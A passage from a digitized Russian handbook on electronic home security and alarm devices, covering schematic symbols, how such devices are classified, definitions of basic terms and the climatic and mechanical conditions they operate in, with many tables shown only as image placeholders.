3. Предпринимательство и безопасность. М., Универсум. 1991 г.

4. Алексеенко В. Н., Сокольский Б. Е. Системы защиты коммерческих объек тов. Технические средства защиты. М., 1992 г.

5. Бизнес и безопасность. М., КМЦ «Центурион». 1992 г.

6. Киселев А. Е. и др. Коммерческая безопасность. М., Иноро Арт. 1993 г.

7. Технические средства охраны, безопасности и сигнализации. Справочник. ВИМИ, 1994 г.

8. Никулин О. Ю., Петрушин А. Н. Системы телевизионного наблюдения. М., «Оберег-РБ», 1997г.

9. Рейке Ч. Д. 55 электронных схем сигнализации. М., Энергоатомиздат, 1991 г.

10. Гюнтер Миль. Электронное дистанционное управление моделями. М., ДОСААФ СССР, 1980г.

11. Андрианов В. И., Бородин В. А., Соколов А. В. «Шпионские штучки» и устройства для защиты объектов и информации. Справочное пособие. «Лань», Спб., 1996г.

12. Андрианов В. И., Соколов А. В. Охранные устройства для автомобилей. «Лань» Спб. 1997 г.

13. Журнал «Системы безопасности». М., «Гротек», 1997 г.

14. Информационно-технический журнал «Техника охраны». М., НИЦ «Охрана» ВНИИПО МВД России, 1996 г.

15. Журнал «БДИ», Спб., 1996-1997 гг.

16. Журнал «Радио», М., 1986-1997 гг.

17. Журнал «Радиолюбитель», Минск, 1993—1997гг.

18. Журнал «Радиоконструктор», Вологда, 1994—1997 гг.

19. Виноградов Ю. А. Электронная охрана (элементы и узлы охранных систем). М., «Символ-Р», 1996г.

2. Сторожевые устройства и охранная сигнализация для дома

Раздел 2.

1. Условные и сокращенные обозначения.

Условные и сокращенные обозначения

AC — акустическая система

БИС — большая интегральная схема

БП — блок питания

БРЭА — бытовая радиоэлектронная аппаратура

БЭ — блок электроники

В — всеклиматическое исполнение

ДН — делитель напряжения

ЕСКД — единая система конструкторской документа ции

ИМ — исполнительный механизм

ИМС — интегральная микросхема

ИП — измерительный прибор

КД — конструкторская документация

КМОП — комплементарная металлоокисно-полупроводниковая схема кпд — коэффициент полезного действия

М — морской климат

НТД — нормативно-техническая документация

О — общеклиматическое исполнение

ОУ — операционный усилитель

ПП — полупроводник

ППП — полупроводниковый прибор

ПСН — параметрический стабилизатор напряжения

РЭ — регулирующий элемент

РЭА — радиоэлектронная аппаратура

РЭУ — радиоэлектронное устройство

СИП — стабилизированный источник питания

СНПТ — стабилизатор напряжения постоянного тока

СОС — система охранной сигнализации

Т — тропический климат

ТВ — тропический влажный климат

ТД — технологическая документация

ТЗ — техническое задание

ТМ — тропический морской климат

ТС — тропический сухой климат

ТУ — технические условия

У — умеренный климат

УОС — устройство охранной сигнализации

УПТ — усилитель постоянного тока

УС — устройство сигнализации

УХЛ — умеренно холодный климат

ХИТ — химический источник тока

ХЛ — холодный климат

ЦПУ — центральный пульт управления

ЭДС — электродвижущая сила

ЭКЗ — электронный кодовый замок

ЭМ — электромагнит

ЭМС — электромагнитная совместимость

ЭСОС — электронная система охранной сигнализации

ЭРИ — электрорадиоизделие

ЭРЭ — электрорадиоэлемент

ЭУОС — электронное устройство охранной сигнализации

2. Глава первая. Основные требования и нормы.

Глава первая. Основные требования и нормы.

1.1. Условные графические и буквенные обозначения элекрорадиоэлементов. Отечественные аналоги зарубежых электрорадиоэлементов.

1. 1. УСЛОВНЫЕ ГРАФИЧЕСКИЕ И БУКВЕННЫЕ ОБОЗНАЧЕНИЯ ЭЛЕКТРОРАДИОЭЛЕМЕНТОВ. ОТЕЧЕСТВЕННЫЕ АНАЛОГИ ЗАРУБЕЖНЫХ ЭЛЕКТРОРАДИОЭЛЕМЕНТОВ

Почти все УОС, все изделия радиоэлектроники и электротехники, изготавливаемые промышленными организациями и предприятиями, домашними мастерами, юными техниками и радиолюбителями, содержат в своем составе определенное количество разнообразных покупных ЭРИ и элементов, выпускаемых в основном отечественной промышленностью. Но за последнее время наблюдается тенденция применения ЭРЭ и комплектующих изделий зарубежного производства. К ним можно отнести в первую очередь ППП, конденсаторы, резисторы, трансформаторы, дроссели, электрические соединители, аккумуляторы, ХИТ, переключатели, установочные изделия и некоторые другие виды ЭРЭ.

Применяемые покупные комплектующие или самостоятельно изготавливаемые ЭРЭ обязательно находят свое отражение на принципиальных и монтажных электрических схемах устройств, в чертежах и другой ТД, которые выполняются в соответствии с требованиями стандартов ЕСКД.

Особое внимание уделяется принципиальным электрическим схемам, которые определяют не только основные электрические параметры, но и все входящие в устройства элементы и электрические связи между ними. Для понимания и чтения принципиальных электрических схем необходимо тщательно ознакомиться с входящими в них элементами и комплектующими изделиями, точно знать область применения и принцип действия рассматриваемого устройства. Как правило, сведения о применяемых ЭРЭ указываются в справочниках и спецификации — перечне этих элементов.

Связь перечня комплектующих ЭРЭ с их условными графическими обозначениями осуществляется через позиционные обозначения.

Для построения условных графических обозначений ЭРЭ используются стандартизованные геометрические символы, каждый из которых применяют отдельно или в сочетании с другими. При этом смысл каждого геометрического образа в условном обозначении во многих случаях зависит от того, в сочетании с каким другим геометрическим символом он применяется.

Стандартизованные и наиболее часто применяемые условные графические обозначения ЭРЭ в принципиальных электрических схемах приведены на рис. 1. 1. Эти обозначения касаются всех комплектующих элементов схем, включая ЭРЭ, проводники и соединения между ними. И здесь важнейшее значение приобретает условие правильного обозначения однотипных комплектующих ЭРЭ и изделий. Для этой цели применяются позиционные обозначения, обязательной частью которых является буквенное обозначение вида элемента, типа его конструкции и цифровое обозначение номера ЭРЭ. На схемах используется также дополнительная часть обозначения позиции ЭРЭ, указывающая функцию элемента, в виде буквы. Основные виды буквенных обозначений элементов схем приведены в табл. 1.1.

Обозначения на чертежах и схемах элементов общего применения относятся к квалификационным, устанавливающим род тока и напряжения,. вид соединения, способы регулирования, форму импульса, вид модуляции, электрические связи, направление передачи тока, сигнала, потока энергии и др.

В настоящее время у населения и в торговой сети находится в эксплуатации значительное количество разнообразных электронных приборов и устройств, радио- и телевизионной аппаратуры, которые изготавливаются зарубежными фирмами и различными акционерными обществами. В магазинах можно приобрести различные типы ЭРИ и ЭРЭ с иностранными обозначениями. В табл. 1. 2 приведены сведения о наиболее часто встречающихся ЭРЭ зарубежных стран с соответствующими обозначениями и их аналоги отечественного производства.

Эти сведения впервые публикуются в таком объеме.

1-11.jpg

Рис 1.1 Условные графические обозначения ЭРЭ в схемах электрических, радиотехнических и автоматизации

1— транзистор структуры р- n-р в корпусе, общее обозначение;

2— транзистор структуры п-р-п в корпусе, общее обозначение,

3 — транзистор полевой с p-n-переходом и п каналом,

4 — транзистор полевой с p-n-переходом и р каналом,

5 — транзистор однопереходный с базой п типа, б1, б2 — выводы

базы, э — вывод эмиттера,

6 — фотодиод,

7 — диод выпрямительный,

8 — стабилитрон (диод лавинный выпрямительный) односторонний,

9 — диод тепло-электрический,

10 — тиристор диодный, стираемый в обратном направлении;

11 — стабилитрон (диодолавинный выпрямительный) с двусторонней проводимостью,

12 — тиристор триодный.

13 — фоторезистор,

14 — переменный резистор, реостат, общее обозначение,

15 — переменный резистор,

16 — переменный резистор с отводами,

17 — построечный резистор-потенциометр;

18 — терморезистор с положительным температурным коэффициентом прямого нагрева (подогрева),

19 — варистор,

20 — конденсатор постоянной емкости, общее обозначение,

21 — конденсатор постоянной емкости поляризованный;

22 — конденсатор оксидный поляризованный электролитический, общее обозначение;

23 — резистор постоянный, общее обозначение;

24 — резистор постоянный с номинальной мощностью 0, 05 Вт;

25 — резистор постоянный с номинальной мощностью 0, 125 Вт,

26 — резистор постоянный с номинальной мощностью 0, 25 Вт,

27 — резистор постоянный с номинальной мощностью 0, 5 Вт,

28 — резистор постоянный с номинальной мощностью 1 Вт,

29 — резистор постоянный с номинальной мощностью рассеяния 2 Вт,

30 — резистор постоянный с номинальной мощностью рассеяния 5 Вт;

31 — резистор постоянный с одним симметричным дополнительным отводом;

32 — резистор постоянный с одним несимметричным дополнительным отводом;

1-12.jpg

Рис 1.1 Условные графические обозначения ЭРЭ в схемах электрических, радиотехнических и автоматизации

33 — конденсатор оксидный неполяризованный,

34 — конденсатор проходной (дуга обозначает корпус, внешний элекрод),

35 — конденсатор переменной емкости (стрелка обозначает ротор);

36 — конденсатор подстроечный, общее обозначение

37 — варикап.

38 — конденсатор помехоподавляющий;

39 — светодиод,

40 — туннельный диод;

41 — лампа накаливания осветительная и сигнальная

42 — звонок электрический

43 — элемент гальванический или аккумуляторный;

44 — линия электрической связи с одним ответвлением;

45 — линия электрической связи с двумя ответвлениями;

46 — группа проводов, подключенных к одной точке электрическою соединения. Два провода;

47 — четыре провода, подключенных к одной точке электрическою соединения;

48 — батарея из гальванических элементов или батарея аккумуляторная;

49 — кабель коаксиальный. Экран соединен с корпусом;

50 — обмотка трансформатора, автотрансформатора, дросселя, магнитного усилителя;

51 — рабочая обмотка магнитного усилителя;

52 — управляющая обмотка магнитного усилителя;

53 — трансформатор без сердечника (магнитопровода) с постоянной связью (точками обозначены начала обмоток);

54 — трансформатор с магнитодиэлектрическим сердечником;

55 — катушка индуктивности, дроссель без магнитопровода;

56 — трансформатор однофазный с ферромагнитным магнитопроводом и экраном между обмотками;

57 — трансформатор однофазный трехобмоточный с ферромагнитным магнитопроводом с отводом во вторичной обмотке;

58 — автотрансформатор однофазный с регулированием напряжения;

59 — предохранитель;

60 — предохранитель выключатель;

б/ — предохранитель-разъединитель;

62 — соединение контактное разъемное;

63 — усилитель (направление передачи сигнала указывает вершина треугольника на горизонтальной линии связи);

64 — штырь разъемного контактного соединения;

1-13.jpg

Рис 1.1 Условные графические обозначения ЭРЭ в схемах электрических радиотехнических и автоматизации

65 — гнездо разъемною контактного соединения,

66 — контакт разборного соединения например с помощью зажима

67 — контакт неразборного соединения, например осуществленного пайкой

68 — выключатель кнопочный однополюсный нажимной с Замыкающим контактом самовозвратом

69 — контакт коммутационного устройства размыкающий, общее обозначение

70 — контакт коммутационного устройства

(выключателя, реле) замыкающий, общее обозначение. Выключатель однополюсный.

71 — контакт коммутационного устройства переключающий, общее обозначение. Однополюсный переключатель на два направления. 72— контакт переключающий трехпозиционный с нейтральным положением

73 — контакт замыкающий без самовозврата

74 — выключатель кнопочный нажимной с размыкающим контактом

75 — выключатель кнопочный вытяжной с замыкающим контактом

76 — выключатель кнопочный нажимной с возвратом кнопки,

77 — выключатель кноночный вытяжной с размыкающим контактом

78 — выключатель кнопочный нажимной с возвратом посредством вторичного нажатия кнопки,

79 — реле электрическое с замыкающим размыкающим и переключающим контактами,

80 — реле поляризованное на одно направление тока в обмотке с нейтральным положением

81 — реле поляризованное на оба направления тока в обмотке с нейтральным положением

82 — реле электротепловое без самовозврата, с возвратом посредством вторичного нажатия кнопки,

83- разъемное однополюсное соединение

84 — гнездо пятипроводного контактного разъемного соединения,

85 штырь контактного разъемного коаксиального соединения

86 — гнездо контактною соединения

87 — штырь четырехпроводного соединения,

88 гнездо четырехпроводного соединения

59 — перемычка коммутационная размыкающая цепь

Таблица 1.1. Буквенные обозначения элементов схем

1-14.jpg

Продолжение табл.1.1

1-15.jpg

Окончание табл. 1.1

1-16.jpg

Таблица 1.2. Отечественные аналоги зарубежных электрорадиоэлементов

1-17.jpg

Продолжение табл. 1. 2

1-18.jpg

Продолжение табл. 1.2

1-19.jpg

Продолжение табл. 1.2

1-110.jpg
.

Продолжение табл. 1.2

1-111.jpg

Продолжение табл.1. 2

1-112.jpg

Продолжение табл. 1.2

1-113.jpg

Окончание табл.1. 2

1-114.jpg

Рис 1.1 Условные графические обозначения ЭРЭ в схемах электрических радиотехнических и автоматизации (окончание)

Изображение: 

Рис 1.1 Условные графические обозначения ЭРЭ в схемах электрических, радиотехнических и автоматизации (продолжение)

Изображение: 

Рис 1.1 Условные графические обозначения ЭРЭ в схемах электрических, радиотехнических и автоматизации

Изображение: 

Таблица 1.1. Буквенные обозначения элементов схем (Окончание)

Изображение: 

Таблица 1.1. Буквенные обозначения элементов схем (Продолжение)

Изображение: 

Таблица 1.1. Буквенные обозначения элементов схем

Изображение: 

Таблица 1.2. Отечественные аналоги зарубежных электрорадиоэлементов (Окончание)

Изображение: 

Таблица 1.2. Отечественные аналоги зарубежных электрорадиоэлементов (Продолжение 1)

Изображение: 

Таблица 1.2. Отечественные аналоги зарубежных электрорадиоэлементов (Продолжение 2)

Изображение: 

Таблица 1.2. Отечественные аналоги зарубежных электрорадиоэлементов (Продолжение 3)

Изображение: 

Таблица 1.2. Отечественные аналоги зарубежных электрорадиоэлементов (Продолжение 4)

Изображение: 

Таблица 1.2. Отечественные аналоги зарубежных электрорадиоэлементов (Продолжение 5)

Изображение: 

Таблица 1.2. Отечественные аналоги зарубежных электрорадиоэлементов (Продолжение 6)

Изображение: 

Таблица 1.2. Отечественные аналоги зарубежных электрорадиоэлементов

Изображение: 

1.2. Классификация электронных устройств охраны и сигализации.

1. 2. КЛАССИФИКАЦИЯ ЭЛЕКТРОННЫХ УСТРОЙСТВ ОХРАНЫ И СИГНАЛИЗАЦИИ

Все рассматриваемые в этом справочнике электронные устройства бытового и общепромышленного применения могут быть классифицированы по многочисленным признакам: функциональному назначению; конструктив ному исполнению; технологии изготовления; условиям применения и эксплуатации, учитывающим устойчивую работу при воздействии внешних факторов; виду входной электроэнергии; конструктивно-технологическим признакам; схемотехническим решениям; количеству охраняемых объектов; способам защиты; факторам электромагнитной защищенности; технико-экономическим признакам и др Рассмотрим некоторые из них.

Функциональное назначение. Классификация ЭУОС по данному признаку предусматривает достаточно жесткое распределение этих изделий по выполняемым ими функциям. Иногда в одном устройстве сочетаются различные функции, которые определяются при конструировании в ТЗ и зависят от назначения и области применения изделия. Согласно этому признаку ЭУОС подразделяются на сигнальные, оповещающие, охранные, отключающие, запирающие и др. Характеристика всех функциональных признаков рассматриваемых устройств подробно раскрывается при описании конкретных изделии этого типа.

Конструктивное исполнение. Этот классификационный признак является для многих ЭУОС наиболее существенным при определении технических возможностей начинающего радиолюбителя, оборудовании мастерских и лабораторий необходимой измерительной аппаратурой и средствами технологического оснащения. В основе классификации но этому признаку лежит конструкция изделия, его конфигурация, внешнее оформление, эргономические и эстетические показатели, которые определяются областью применения конкретного устройства и местом расположения на охраняемом объекте. Очень часто при конструировании УОС приходится учитывать особенности охраняемых объектов, их геометрические размеры, объем и форму, и даже их статические и динамические характеристики, если речь идет о средствах передвижения или стационарных объектах.

Классифицируются УОС по конструктивному исполнению на встраиваемые, автономные в виде самостоятельных сборочных единиц и комбинированные. Электронная часть УОС, как правило, собирается в отдельных пластмассовых или металлических корпусах с электрическим монтажом комплектующих ЭРЭ на печатных платах. Печатные платы выполняются из фольгированного стеклотекстолита или гетинакса толщиной 1, 5... 2 мм.

Необходимо заметить, что в данном справочнике при описании УОС не даются прямые указания по их конструктивному исполнению, то есть предоставляется достаточная самостоятельность для разработки конкретных конструкций. Но во всех случаях радиолюбители должны сначала осуществить эскизную проработку, а затем выполнить конструкторскую разработку УОС с оформлением чертежей деталей и сборочных единиц. Такая проработка должна осуществляться в соответствии с требованиями стандартов государственной системы ЕСКД.

Тенденции развития электронной техники и электротехники на базе микроминиатюризации требуют применения широкой номенклатуры маломощных и малогабаритных устройств и изделий (преобразователей, трансформаторов, усилителей, фильтров, стабилизаторов, выпрямителей и т. д.), выполненных на новой конструктивной основе ЭРЭ. Достижения науки и техники на современном этапе развития в области электронной техники позволяют значительно уменьшить массогабаритные характеристики рассматриваемых электронных устройств. В настоящее время конструирование РЭА, РЭУ и ЭРЭ характеризуется резким увеличением применения БИС, что также дает возможность уменьшить объемы устройств и одновременно улучшить их качественные характеристики, показатели надежности и долговечности.

Технология изготовления. Классификация ЭУОС по данному признаку определяет вес основные и заключительные операции изготовления изделий и является главной при оценке их трудоемкости и стоимости.

В условиях радиолюбительских лабораторий и домашних мастерских, которые оснащены, как правило, несложным технологическим оборудованием, наиболее простой операцией изготовления УОС является традиционное ручное производство деталей и сборочных единиц, из которых впоследствии выполняются узлы, блоки и самостоятельные сборки. Это позволяет условно классифицировать данные устройства по технологическим признакам на простые, средней сложности и сложные.

К простым технологическим изделиям относятся такие, в которых конструкция и схема ЭУОС содержат набор деталей и ЭРЭ из резисторов, конденсаторов, электромеханических реле и ППП малой мощности с общим количеством, не превышающим 10 единиц. При этом сборка и монтаж устройств осуществляются преимущественно с помощью объемного навесного монтажа и винтовых соединений.

Электронные УОС средней технологической сложности включают в свой состав кроме указанных комплектующих ЭРЭ транзисторы малой и средней мощности, тиристоры, герконы, индикаторы, ППП и другие, электрический монтаж которых осуществляется преимущественно с помощью печатного монтажа. Общее количество деталей и комплектующих ЭРЭ в устройствах средней технологической сложности может превысить 50 единиц. Если электропитание простых устройств осуществляется от встроенных ХИТ, то изделия средней технологической сложности получают его от вторичных источников, имеющих в своем составе преобразователи

энергии, выпрямительные устройства и стабилизаторы напряжения параметрического или компенсационного типов, работающие от сети переменного тока напряжением 220 В, частотой 50 Гц.

Сложные изделия и устройства включают в свой состав десятки и сотни комплектующих ЭРЭ и механических деталей. Принципиальные электрические схемы этих устройств содержат многообразные ИМС и БИС. С точки зрения технологии изготовления, сложные изделия характеризуются повышенным уровнем трудоемкости и часто могут быть реализованы лишь в условиях хорошо оснащенных домашних мастерских. Следует заметить, что только для распайки выводов ИМС, собранных в стандартных корпусах с 14 или 16 выводами, потребуется изготовить сначала специальные приспособления, а сама пайка выполняется при строго определенных режимах нагрева во времени.

Сложные технологические изделия имеют, как правило, комбинированное электропитание: от сети переменного тока и от автономного источника. В качестве автономных источников электропитания могут выступать различные ХИТ: гальванические элементы и батареи, аккумуляторы разных систем.

Структурная схема признаков классификации УОС, построенных на базе электроники, рассмотрена на рис. 1. 2.

Структурная схема условного деления электронных систем защиты и сигнализации на функциональные узлы и самостоятельные сборочные единицы приведена на рис. 1. 3.

Условия применения и эксплуатации. Классификация электронных устройств данного класса по этому признаку, основные нормы и требования для каждой классификационной группы но климатическим (температуре, повышенной влажности и атмосферному давлению) и механическим (синусоидальной вибрации и механическому удару) воздействиям приведены в табл. 1. 3. и 1. 4. Значения повышенной и пониженной рабочих температур даются при рассмотрении конкретных изделий и, как правило, указываются в ТУ на данное устройство. Рабочую температуру выбирают из следующего параметрического ряда: —40, —35, —30, —25, —22, —20, —18, -15, -10, -5, 0, 5, 10, 15, 18, 20, 22, 25, 27, 30, 40, 45, 50, 55, 70, 85, 100, 125 °С.

е11.jpg

Рис.1.2 Структурная схема признаков классификации устройств охраны и сигнализации

1-21.jpg

Рис. 1.3 Структурная схема условного деления электронных систем защиты и сигнализации

Таблица 1.3 Классификация УОС по климатическим воздействиям

1-22.jpg

Группы исполнения ЭУОС выбирается исходя из условий применения, норм и требований, их конструктивных исполнений, а также достигнутого уровня стойкости в частности механических и климатических воздействий. Устройства, создание которых невозможно или нецелесообразно по требованиям изложенным в табл. 1. 4 и 1. 5, должны разрабатываться по менее жестким требованиям с учетом возможных мер индивидуальной или общей защиты. Рис.12 Структурная схема признаков классификации устройств охраны и сигнализации.

Таблица 1.4. Классификация ЭКЗ и УОС по механическим воздействиям

е21.jpg

Рис. 1.2 Структурная схема признаков классификации устройств охраны и сигнализации

Изображение: 

Рис. 1.3 Структурная схема условного деления электронных систем защиты и сигнализации

Изображение: 

Таблица 1.3 Классификация УОС по климатическим воздействиям

Изображение: 

Таблица 1.4. Классификация ЭКЗ и УОС по механическим воздействиям

Изображение: 

1.3. Основные понятия и их определения.

1.3. ОСНОВНЫЕ ПОНЯТИЯ И ИХ ОПРЕДЕЛЕНИЯ

Аккумулятор вторичный химический источник тока, состоящий из одного гальванического элемента.

Аккумуляторная батарея — вторичный химический источник тока, состоящий из двух и более аккумуляторов, соединенных между собой электрически для совместного производства электрической энергии.

Активный фильтр — электрический частотный фильтр, содержащий один или несколько усилительных элементов.

Время готовности электронного УОС — интервал времени между моментом подачи входного напряжения и моментом, после которого параметры этих устройств удовлетворяют заданным требованиям.

Гальваническая связь — связь электрических цепей посредством электрического поля в проводящей среде.

Гальванический элемент — химический источник тока, состоящий из одной гальванической ячейки.

Емкость конденсатора — электрическая емкость между электродами конденсатора.

Диэлектрик — вещество, основным электрическим свойством которого является способность поляризоваться в электрическом поле.

Источник вторичного электропитания электронного устройства — средство вторичного электропитания УОС, обеспечивающее вторичным электропитанием самостоятельные функциональные узлы или отдельные цепи этих устройств.

Компенсационный стабилизатор напряжения вторичного электропитания — стабилизатор напряжения вторичного электропитания, в котором стабилизация осуществляется за счет воздействия изменения выходного напряжения на его регулирующее устройство через цепь обратной связи.

Коэффициент трансформации отношение числа витков вторичной обмотки к числу витков первичной или отношение напряжения на вторичной обмотке к напряжению на первичной обмотке в режиме холостого хода без учета падения напряжения на трансформаторе.

Конденсатор — элемент электрической цепи, предназначенный для использования его емкости.

Коэффициент стабилизации напряжения источника вторичного электропитания электронного устройства отношение относительного о изменения входного напряжения электропитания к выходному напряжению, вызванному им относительного изменения выходного напряжения

Вероятность безотказной работы — вероятность того, что в пределах заданной наработки отказ электронного У ОС не возникает.

Временное резервирование — резервирование с применением резервов времени.

Время восстановления работоспособности электронного УОС — продолжительность восстановления работе способного состояния объекта.

Комплексный показатель надежности — показатель надежности, характеризующий несколько свойств, составляющих надежность УОС.

Надежность сторожевого и сигнального устройства свойство изделия выполнять заданные функции, сохраняя свои эксплуатационные показа гели в заданных пределах в течение требуемого промежутка времени или требуемой наработки на отказ.

Напряжение питания — постоянное или переменное напряжение на входе аппаратуры, на которое она должна быть рассчитана.

Напряжение химического источника тока — разность потенциалов между выводами химического источника тока

Наработка — продолжительность или объем работы изделия, измеряемые в часах, километрах, циклах или других единицах.

Наработка на отказ — среднее значение наработки ремонтируемого изделия между отказами.

Необслуживаемый объект (сторожевое и сигнальное устройство) — объект, для которого проведение технических обслуживаний не предусмотрено в НТД или КД.

Начальное напряжение химического источника тока — напряжение химического источника тока в начале разряда, а при прерывистом разряде в начале первого периода разряда.

Номинальное напряжение питания — условное значение напряжения, относительно которого устанавливают допускаемые отклонения.

Номинальное напряжение химического источника тока — напряжение химическою источника тока, указанное изготовителем, характеризующее данный химический источник тока.

Напряженность магнитного поля — векторная величина, равная геометрической разности магнитной индукции, деленной на магнитную постоянную, и намагниченности.

Однофазное электротехническое устройство — электротехническое устройство, предназначенное для включения в однофазную электрическую цепь и не предназначенное для преобразования числа фаз.

Одноканальный источник вторичного электропитания сторожевых и сигнальных устройств — источник вторичного электропитания, имеющий один выход.

Основная приведенная погрешность — отношение погрешности измерительного прибора, используемого в нормальных условиях эксплуатации, к нормирующему значению.

Параметрический стабилизатор напряжения вторичного электропитания сторожевых и сигнальных устройств — стабилизатор напряжения вторичного электропитания, в котором отсутствует цепь обратной связи и стабилизация осуществляется за счет использования нелинейных элементов, входящих в его состав.

Полупроводник — вещество, основным свойством которого является сильная зависимость его электропроводимости от воздействия внешних факторов.

Показатель надежности — количественная характеристика одного или нескольких свойств, составляющих надежность объекта.

Рабочее напряжение питания — напряжение, находящееся в пределах допускаемых отклонений от номинального напряжения, в которых обеспечивается работа УОС в заданных пределах.

Резистор — элемент электрической цепи, предназначенный для использования его электрического сопротивления.

Ремонтируемые сторожевые и сигнальные устройства — изделия, для которых проведение ремонтов предусмотрено в НТД и КД.

Ремонтопригодность свойство объема, заключающееся в приспособленности к предупреждению и обнаружению причин возникновения отказов, повреждений и восстановлению работоспособного состояния путем проведения технического обслуживания и ремонтов.

Отказ — событие (совокупность событий), заключающееся в нарушении работоспособного состояния устройства.

Система вторичного электропитания сторожевых и сигнальных устройств — средство вторичною электропитания этих устройств, обеспечивающее вторичным электропитанием по заданной программе все цепи комплекса.

Срок службы — календарная продолжительность от начала эксплуатации устройства или ее возобновления после ремонта определенного вида до перехода в предельное состояние.

Схема электрической цепи — графическое изображение электрической цепи, содержащее условное обозначение ее элементов и показывающее соединения этих элементов.

Стабилизатор напряжения вторичного электропитания сторожевых и сигнальных устройств — функциональный узел вторичного электропитания устройства, осуществляющий стабилизацию выходного напряжения без изменения рода напряжения (тока).

Ток включения — максимальное мгновенное значение входного тока при включении источника вторичного электропитания.

Функциональный узел сторожевого или сигнального устройства — устройство, входящее в состав схемы и выполняющее одну или несколько задач, обеспечивающих четкую работу всей системы охраны и сигнализации.

Химический источник тока — устройство, в котором химическая реакция заложенных в нем веществ непосредственно преобразуется в электрическую энергию при протекании электрохимических реакций.

Шифр — совокупность условных знаков для хранения и передачи информации в электронных устройствах.

Код — совокупность знаков и система определения правил, при помощи которых информация может быть

представлена (закодирована) в виде набора из таких символов для передачи, обработки и хранения (запоминания). Конечная последовательность кодовых знаков обозначается чаще всего цифрами и числами (0;1...66, 255 и т. д.).

Электрическая цепь — совокупность устройств и объектов образующих пун. для электрического тока, электромагнитные процессы в которых могут быть описаны с помощью понятий об электродвижущей силе, токе и напряжении.

Электрическое напряжение скалярная величина, равная линейному интегралу напряженности и электрического поля.

Электрическое соединение — соединение участков электрической цепи, при помощи которого образуется электрическая цепь.

Электрическое сопротивление постоянному току — скалярная величина, равная отношению постоянного напряжения на участке пассивной электрической цепи к постоянному току в нем при отсутствии на этом участке ЭДС.

Электродвижущая сила — скалярная величина, характеризующая способность стороннего поля и индуктированного электрического поля вызывать электрический ток.

Информационное резервирование — резервирование с применением резервов информации.

1.4. Условия эксплуатации электронных устройств охраны и сигнализации.

1. 4. УСЛОВИЯ ЭКСПЛУАТАЦИИ ЭЛЕКТРОННЫХ УСТРОЙСТВ ОХРАНЫ И СИГНАЛИЗАЦИИ

Надежная, безотказная и долговечная эксплуатация ЭУОС обеспечивается многочисленными техническими требованиями, нормированными электрическими параметрами, нормами эксплуатации и их обязательным соблюдением как в ходе изготовления, так и в процессе работы. При создании УОС необходимо учитывать, что они работают, как правило, в жестких условиях температурных нагрузок и большого числа внешних воздействующих факторов. Неправильная оценка или незнание этих факторов, а также использование УОС с отступлением от номинальных режимов эксплуатации являются почти всегда основной причиной многих отказов и повреждении.

Как отмечалось ранее, все изделия электронной техники и электротехники, к которым прямо относятся УОС, а также большинство изделий радиотехники производственно-технического назначения и бытового потребления, изготавливаемых для нужд народного хозяйства страны и для поставки на экспорт, классифицируются по условиям применения, для них установлены нормы и требования по стойкости к внешним воздействующим факторам: механическим, климатическим, биологическим и электромагнитным.

Конструктивно-технологические исполнения УОС для различных климатических районов страны, категории исполнения, условия эксплуатации, хранения и транспортирования для всех видов приборов и других изделий народнохозяйственного, культурно-бытового назначения, хозяйственного обихода и общего назначения установлены государственными, межотраслевыми и отраслевыми стандартами.

Категории размещения сторожевых и сигнальных устройств, их обозначения, принятые в НТД, приводятся в табл. 1. 5.

При конструировании и эксплуатации УОС, являющихся совокупностью функциональных узлов, блоков и сложных комплектующих изделий и представляющих единую конструкцию, необходимо учитывать требования к устойчивости этих устройств при механических, биологических, климатических и электромагнитных воздействиях, а также требования к конструкции и электрическим параметрам. Производственно-технологические процессы создания новых устройств охраны по заданным или расчетным значениям электрических и конструктивных характеристик, механических и климатических воздействий всегда носят комплексный характер. Только такой подход к созданию и проектированию изделий позволяет принимать правильное решение, обеспечивающее получение желательного результата и оптимального съемно-технического решения.

УОС, изготавливаемые как самостоятельные сборочные единицы, создаются для эксплуатации в нескольких макроклиматических районах и всевозможных местах

Таблица 1. 5 Категории размещения сторожевых и сигнальных устройств

1-41.jpg

Окончание табл.1.5

Укрупненные основные категории

Дополнительные категории

Обозначение

Область применения

Обозначение

Область применения

овощехранилищ, подземных гаражей, подвалов, при отсутствии прямого воздействия атмосферных осадков.

Для работы ЭКЗ и УОС в неотапливаемых и невентилируемых помещениях, в которых возможно длительное наличие воды или частая конденсация влаги на стенах и потолке, в частности в помещениях гидрометаллургических производств

тегории 5, где исключается возможность конденсации влаги на комплектующих элементах


размещения. Это диктуется в основном экономической и технической целесообразностью.

УОС бытового и общепромышленного назначения, проектируемые и выпускаемые промышленностью по категориям размещения (табл. 1. 6), классифицируют по группам эксплуатации. Некоторые виды этих устройств бытового назначения, изготавливаемые в исполнении УХЛ по категориям размещения и группам эксплуатации, даны в табл. 1. 6.

Если изделия и устройства изготавливаются промышленным способом, то обозначения видов климатического исполнения указывают в КД и ТД, а также на этикетке, на которой приводится марка изделия. В последнее время появилось много самодельных УОС, изготавливаемых, как правило, по эскизной документации в неприспособленных мастерских различных малых предприятий, кооперативов и акционерных обществ, которые не учитывают требования внешних воздействующих факторов, и в КД на эти изделия не даются сведения о климатическом исполнении. В общем виде обозначение видов климатического исполнения охранных устройств должно включать либо сочетание исполнения и категории, отражающее наиболее жесткие условия эксплуатации, либо несколько исполнений и категорий, для которых предназначены эти изделия.

Важную роль при эксплуатации УОС и их функциональных узлов играют температура окружающей среды

Таблица 1.6 Группы сторожевых и сигнальных устройств

1-42.jpg

и значение относительной влажности воздуха при этой температуре. Нормальные и предельные рабочие температуры окружающей среды при эксплуатации изделий электронной техники и значения относительной влажности приведены в табл. 1.7. и 1.8.

Таблица 1.7. Температура воздуха при эксплуатации сторожевых и сигнальных устройств

1-43.jpg

Окончание табл. 1. 7

1-44.jpg

Таблица 1.8. Относительная влажность воздуха при эксплуатации сторожевых и сигнальных устройств.

1-45.jpg

Таблица 1.5 Категории размещения сторожевых и сигнальных устройств

Изображение: 

Таблица 1.6 Группы сторожевых и сигнальных устройств

Изображение: 

Таблица 1.7. Температура воздуха при эксплуатации сторожевых и сигнальных устройств (окончание)

Изображение: 

Таблица 1.7. Температура воздуха при эксплуатации сторожевых и сигнальных устройств

Изображение: 

Таблица 1.8. Относительная влажность воздуха при эксплуатации сторожевых и сигнальных устройств.

Изображение: 

1.5. Электропитание устройств охраны и сигнализации.

1. 5. ЭЛЕКТРОПИТАНИЕ УСТРОЙСТВ ОХРАНЫ И СИГНАЛИЗАЦИИ

